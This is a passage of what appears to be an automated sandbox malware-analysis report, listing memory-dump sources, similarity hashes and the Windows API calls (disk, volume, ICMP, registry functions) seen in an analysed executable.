                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                  • String ID: \VH
                                                                                                                  • API String ID: 1682464887-234962358
                                                                                                                  • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                  • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                                  • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                  • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                  • String ID: \VH
                                                                                                                  • API String ID: 1682464887-234962358
                                                                                                                  • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                  • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                                  • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                  • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                  • String ID: \VH
                                                                                                                  • API String ID: 1682464887-234962358
                                                                                                                  • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                  • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                                  • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                  • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$InformationVolume
                                                                                                                  • String ID: \VH
                                                                                                                  • API String ID: 2507767853-234962358
                                                                                                                  • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                  • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                                  • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                  • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$InformationVolume
                                                                                                                  • String ID: \VH
                                                                                                                  • API String ID: 2507767853-234962358
                                                                                                                  • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                  • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                                  • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                  • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                                  • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                  • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                  • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                                  • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                  • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                  • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                                                  • String ID: crts
                                                                                                                  • API String ID: 943502515-3724388283
                                                                                                                  • Opcode ID: b7f7d2554fea0452f99a8f24dbd752476e5f1c79680b7961fcd5d27bdb15ef52
                                                                                                                  • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                                  • Opcode Fuzzy Hash: b7f7d2554fea0452f99a8f24dbd752476e5f1c79680b7961fcd5d27bdb15ef52
                                                                                                                  • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                                  • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                                  • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$LabelVolume
                                                                                                                  • String ID: \VH
                                                                                                                  • API String ID: 2006950084-234962358
                                                                                                                  • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                  • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                                  • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                  • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                  • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                                  • DrawMenuBar.USER32 ref: 00449761
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 772068139-4108050209
                                                                                                                  • Opcode ID: 1e1b244af1523844e521c8eaee649aafc8588e46956b7b390632b27f556c56d3
                                                                                                                  • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                                  • Opcode Fuzzy Hash: 1e1b244af1523844e521c8eaee649aafc8588e46956b7b390632b27f556c56d3
                                                                                                                  • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$_wcscpy
                                                                                                                  • String ID: 3, 3, 8, 1
                                                                                                                  • API String ID: 3469035223-357260408
                                                                                                                  • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                  • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                                                  • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                  • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                                  • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                  • API String ID: 2574300362-3530519716
                                                                                                                  • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                  • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                                  • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                  • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                                  • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                  • API String ID: 2574300362-275556492
                                                                                                                  • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                  • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                                  • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                  • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                                  • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                  • API String ID: 2574300362-58917771
                                                                                                                  • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                  • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                                  • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                  • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                  • API String ID: 2574300362-4033151799
                                                                                                                  • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                  • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                                  • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                  • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
